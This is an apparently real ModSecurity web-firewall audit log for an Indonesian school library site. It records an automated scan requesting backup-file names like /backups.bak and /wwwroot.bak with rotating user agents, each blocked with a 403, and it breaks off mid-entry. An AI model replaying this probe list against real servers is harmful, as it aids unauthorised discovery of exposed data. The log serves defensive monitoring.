X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757605 --edd2a507-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --edd2a507-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227003085 1550 (- - -) Stopwatch2: 1747683227003085 1550; combined=622, p1=317, p2=279, p3=0, p4=0, p5=26, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --edd2a507-Z-- --5f5ac026-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1QAAAAg 103.236.140.4 33760 103.236.140.4 8181 --5f5ac026-B-- GET /store.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_5; rv:60.0) Gecko/20100101 Firefox/60.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530739 --5f5ac026-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5f5ac026-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227005924 1512 (- - -) Stopwatch2: 1747683227005924 1512; combined=601, p1=300, p2=275, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5f5ac026-Z-- --368b146e-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1gAAAA0 103.236.140.4 33760 103.236.140.4 8181 --368b146e-B-- GET /bak.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:67.0) Gecko/20100101 Firefox/67.0 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871718 --368b146e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --368b146e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227008392 1796 (- - -) Stopwatch2: 1747683227008392 1796; combined=648, p1=335, p2=287, p3=0, p4=0, p5=26, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --368b146e-Z-- --b9a0bc0b-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo1wAAAAU 103.236.140.4 33904 103.236.140.4 8181 --b9a0bc0b-B-- GET /files.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530742 --b9a0bc0b-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --b9a0bc0b-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227008561 1822 (- - -) Stopwatch2: 1747683227008561 1822; combined=676, p1=318, p2=330, p3=0, p4=0, p5=28, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b9a0bc0b-Z-- --5226c638-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2AAAABQ 103.236.140.4 33904 103.236.140.4 8181 --5226c638-B-- GET /erpustakaan_smkn22jakarta_sch_id.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.91 Safari/537.36 OPR/55.0.2994.61 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871723 --5226c638-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5226c638-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227012733 1732 (- - -) Stopwatch2: 1747683227012733 1732; combined=735, p1=321, p2=379, p3=0, p4=0, p5=35, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --5226c638-Z-- --43afeb41-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2gAAABM 103.236.140.4 33760 103.236.140.4 8181 --43afeb41-B-- GET /2013.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686; rv:66.0.1) Gecko/20100101 Firefox/66.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182428 --43afeb41-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --43afeb41-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227016674 1506 (- - -) Stopwatch2: 1747683227016674 1506; combined=598, p1=305, p2=267, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --43afeb41-Z-- --3d49910f-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo2wAAAAo 103.236.140.4 33760 103.236.140.4 8181 --3d49910f-B-- GET /new.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 OPR/56.0.3051.43 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871734 --3d49910f-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --3d49910f-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227018696 1912 (- - -) Stopwatch2: 1747683227018696 1912; combined=737, p1=341, p2=369, p3=0, p4=0, p5=27, sr=74, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --3d49910f-Z-- --e5dbb15c-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo3AAAAAw 103.236.140.4 33902 103.236.140.4 8181 --e5dbb15c-B-- GET /customers.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.1805 Safari/537.36 OPR/54.0.2952.51 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167182431 --e5dbb15c-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --e5dbb15c-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227019062 1744 (- - -) Stopwatch2: 1747683227019062 1744; combined=680, p1=334, p2=307, p3=0, p4=0, p5=38, sr=70, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e5dbb15c-Z-- --d228b014-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4AAAABA 103.236.140.4 33904 103.236.140.4 8181 --d228b014-B-- GET /com.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/67.0.3396.87 Safari/537.36 OPR/54.0.2952.54 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757626 --d228b014-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d228b014-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227024068 1590 (- - -) Stopwatch2: 1747683227024068 1590; combined=673, p1=357, p2=288, p3=0, p4=0, p5=27, sr=69, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d228b014-Z-- --576f9933-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4QAAAAA 103.236.140.4 33904 103.236.140.4 8181 --576f9933-B-- GET /wwwroot.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.80 Safari/537.36 OPR/56.0.3051.104 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 164757637 --576f9933-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --576f9933-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227030172 1682 (- - -) Stopwatch2: 1747683227030172 1682; combined=698, p1=338, p2=332, p3=0, p4=0, p5=28, sr=89, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --576f9933-Z-- --d94b6918-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo4wAAABI 103.236.140.4 33756 103.236.140.4 8181 --d94b6918-B-- GET /backups.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_3; rv:52.0.1) Gecko/20100101 Firefox/52.0.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 167805001 --d94b6918-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --d94b6918-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227031684 1808 (- - -) Stopwatch2: 1747683227031684 1808; combined=682, p1=307, p2=348, p3=0, p4=0, p5=27, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d94b6918-Z-- --8bee766a-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo5AAAAAs 103.236.140.4 33902 103.236.140.4 8181 --8bee766a-B-- GET /smkn22jakarta.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:52.5.3) Gecko/20100101 Firefox/52.5.3 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530767 --8bee766a-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --8bee766a-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227033335 1596 (- - -) Stopwatch2: 1747683227033335 1596; combined=666, p1=316, p2=324, p3=0, p4=0, p5=26, sr=71, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --8bee766a-Z-- --18fc923e-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo5QAAABU 103.236.140.4 33902 103.236.140.4 8181 --18fc923e-B-- GET /media.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530770 --18fc923e-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --18fc923e-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227035512 1687 (- - -) Stopwatch2: 1747683227035512 1687; combined=708, p1=303, p2=377, p3=0, p4=0, p5=28, sr=68, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --18fc923e-Z-- --2bd91a51-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo6AAAAAk 103.236.140.4 33756 103.236.140.4 8181 --2bd91a51-B-- GET /web.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (X11; Linux i686 on x86_64; rv:57.0.4) Gecko/20100101 Firefox/57.0.4 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 160530784 --2bd91a51-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --2bd91a51-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227042573 1547 (- - -) Stopwatch2: 1747683227042573 1547; combined=619, p1=313, p2=279, p3=0, p4=0, p5=27, sr=65, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --2bd91a51-Z-- --f4d1c370-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7AAAAAM 103.236.140.4 33756 103.236.140.4 8181 --f4d1c370-B-- GET /smkn22jakarta_sch_id.backup HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1; rv:52.2.1) Gecko/20100101 Firefox/52.2.1 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227067 --f4d1c370-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --f4d1c370-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".backup"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227072455 1669 (- - -) Stopwatch2: 1747683227072455 1669; combined=662, p1=316, p2=320, p3=0, p4=0, p5=26, sr=67, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --f4d1c370-Z-- --fd608e47-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7QAAABg 103.236.140.4 33756 103.236.140.4 8181 --fd608e47-B-- GET /engine.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/63.0.3239.132 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 118227070 --fd608e47-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --fd608e47-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227075547 1673 (- - -) Stopwatch2: 1747683227075547 1673; combined=691, p1=307, p2=352, p3=0, p4=0, p5=32, sr=69, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --fd608e47-Z-- --5d128f5d-A-- [20/May/2025:02:33:47 +0700] aCuHmzuVdcwZ_qZ5ZIoo7gAAAAg 103.236.140.4 33756 103.236.140.4 8181 --5d128f5d-B-- GET /localhost.bak HTTP/1.1 Host: perpustakaan.smkn22jakarta.sch.id X-Real-IP: 206.82.6.62 X-Forwarded-Host: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Server: perpustakaan.smkn22jakarta.sch.id X-Forwarded-Proto: https User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_12_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.109 Safari/537.36 Accept: */* Cookie: X-Forwarded-For: 206.82.6.62 Accept-Encoding: gzip X-Varnish: 165871812 --5d128f5d-F-- HTTP/1.1 403 Forbidden X-Frame-Options: SAMEORIGIN Content-Length: 199 Content-Type: text/html; charset=iso-8859-1 --5d128f5d-H-- Message: Access denied with code 403 (phase 2). Match of "pmFromFile userdata_wl_extensions" against "TX:extension" required. [file "/usr/local/apache/modsecurity-cwaf/rules/10_HTTP_HTTP.conf"] [line "27"] [id "210730"] [rev "5"] [msg "COMODO WAF: URL file extension is restricted by policy||perpustakaan.smkn22jakarta.sch.id|F|2"] [data ".bak"] [severity "CRITICAL"] [tag "CWAF"] [tag "HTTP"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1747683227078721 1506 (- - -) Stopwatch2: 1747683227078721 1506; combined=615, p1=301, p2=288, p3=0, p4=0, 